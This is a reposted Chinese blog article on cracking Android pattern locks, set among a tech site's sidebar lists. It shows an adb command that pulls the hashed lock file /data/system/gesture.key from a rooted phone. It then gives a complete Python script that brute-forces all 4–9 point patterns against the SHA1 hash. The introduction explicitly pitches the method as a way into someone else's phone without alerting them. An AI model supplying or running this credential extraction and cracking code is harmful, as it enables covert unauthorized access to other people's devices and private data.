转载

基于Python的安卓图形锁破解程序

安卓手机的图形锁是 3x3 的点阵,按次序连接数个点从而达到锁定 / 解锁的功能。最少需要连接 4 个点,最多能连接 9 个点。网上也有暴力删除手机图形锁的方法,即直接干掉图形锁功能。但假如你想进入 别人的手机,但又不想引起其警觉的话……你可以参考一下本文(前提条件:手机需要root,而且打开调试模式。一般来讲,如果用过诸如“豌豆荚手机助手”、“360手机助手”一类的软件,都会被要求打开调试模式的。如果要删除手机内置软件,则需要将手机root)。

首先科普一下,安卓手机是如何标记这 9 个点的。通过阅读安卓系统源码可知,每个点都有其编号,组成了一个 3x3 的矩阵,形如:

00 01 02

03 04 05

06 07 08

假如设定解锁图形为一个“ L ”形,如图:

基于Python的安卓图形锁破解程序

那么这几个点的排列顺序是这样的: 00 03 06 07 08 。系统就记下来了这一串数字,然后将这一串数字(以十六进制的方式)进行SHA1加密,存储在了手机里的/data/system/gesture.key 文件中。我们用数据线连接手机和电脑,然后ADB连接手机,将文件下载到电脑上(命令:adb pull /data/system/gesture.key gesture.key),如图:

基于Python的安卓图形锁破解程序

用WinHex等十六进制编辑程序打开gesture.key,会发现文件内是SHA1加密过的字符串:c8c0b24a15dc8bbfd411427973574695230458f0,如图:

基于Python的安卓图形锁破解程序

当你下次解锁的时候,系统就对比你画的图案,看对应的数字串是不是 0003060708对应的加密结果 。如果是,就解锁;不是就继续保持锁定。那么,如果穷举所有的数字串排列,会有多少呢?联想到高中的阶乘, 如果用 4 个点做解锁图形的话,就是 9x8x7x6=3024 种可能性,那 5 个点就是15120, 6 个点的话60480,7个点181440,8个点362880, 9 个点362880 。总共是985824种可能性( 但这么计算并不严密,因为同一条直线上的点只能和他们相邻的点相连 )。满打满算,也不到985824 种可能性。乍一看很大,但在计算机面前,穷举出来这些东西用不了几秒钟。

知道了原理,就着手写程序来实现吧。这里使用了 Python 来完成任务。主要应用了 hashlib 模块 (对字符串进行 SHA1 加密)和 itertools 模块(Python内置,生成 00-09 的排列组合)。主要流程为:

1.ADB 连接手机,获取 gesture.key 文件

2.读取 key 文件,存入字符串 str_A

3. 生成全部可能的数字串

4. 对这些数字串 进行加密,得到字符串 str_B

5. 将字符串 str_A str_B 进行对比

6. 如果字符串 A B 相同,则说明数字串 num 就是想要的解锁顺序

7. 打印出数字串 num

代码如下:

# -*- coding: cp936 -*- import itertools import hashlib import time import os #调用cmd,ADB连接到手机,读取SHA1加密后的字符串 os.system("adb pull /data/system/gesture.key gesture.key") time.sleep(5) f=open('gesture.key','r') pswd=f.readline() f.close() pswd_hex=pswd.encode('hex') print '加密后的密码为:%s'%pswd_hex #生成解锁序列,得到['00','01','02','03','04','05','06','07','08'] matrix=[]  for i in range(0,9):  str_temp = '0'+str(i)  matrix.append(str_temp) #将00——08的字符进行排列,至少取4个数排列,最多全部进行排列  min_num=4 max_num=len(matrix) for num in range(min_num,max_num+1):#从04 -> 08  iter1 = itertools.permutations(matrix,num)#从9个数字中挑出n个进行排列  list_m=[]  list_m.append(list(iter1))#将生成的排列全部存放到 list_m 列表中  for el in list_m[0]:#遍历这n个数字的全部排列   strlist=''.join(el)#将list转换成str。[00,03,06,07,08]-->0003060708   strlist_sha1 = hashlib.sha1(strlist.decode('hex')).hexdigest()#将字符串进行SHA1加密   if pswd_hex==strlist_sha1:#将手机文件里的字符串与加密字符串进行对比    print '解锁密码为:',strlist

按说得到解锁密码后,应该break跳出循环的。但Python没有跳出多重循环的语句,本想设置标志位然后不停进行判定,为了运行速度就免去了这个步骤(有没有更好的实现跳出多重循环的方法?)。另外也略去了很多容错语句。

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 springcloud-demo Hive教程 Ant教程 ANTLR教程 SpringCloud java实例教程 XStream教程 Hazelcast教程 Elastic-Job-Lite 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 solr教程 Hadoop教程 WebService CXF学习 JPA教程 ActiveMQ中文指南 java-demo Java内存模型 dubbo教程 python3-demo Linux入门视频教程
近期评论
  1. 1 如何将Spring Cloud Task发布Data Flow上执行?
  2. 2 Spring Cloud Data Flow快速入门Demo
  3. 3 Spring Cloud Consul实现选举机制
  4. 4 Spring Boot集成ShedLock实现分布式定时任务
  5. 5 利用oss进行数据库和网站图片备份
  6. 6 Spring Cloud Stream实现数据流处理
  7. 7 Python3访问MySQL数据库快速入门Demo
  8. 8 Github开源项目作者可以免费申请 JetBrains 全家桶
  9. 9 Spring Cloud Vault快速入门Demo
  10. 10 Spring Cloud Gateway快速入门Demo
网站信息
  • 文章总数:82,716 篇
  • 文件总数:284,297 个
  • 标签总数:2,396 个
  • 分类总数:85 个
  • 留言数量:2,560 条
  • 在线人数:602 人
  • 运行天数:4,411天
  • 最后更新:2024年11月24日21点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG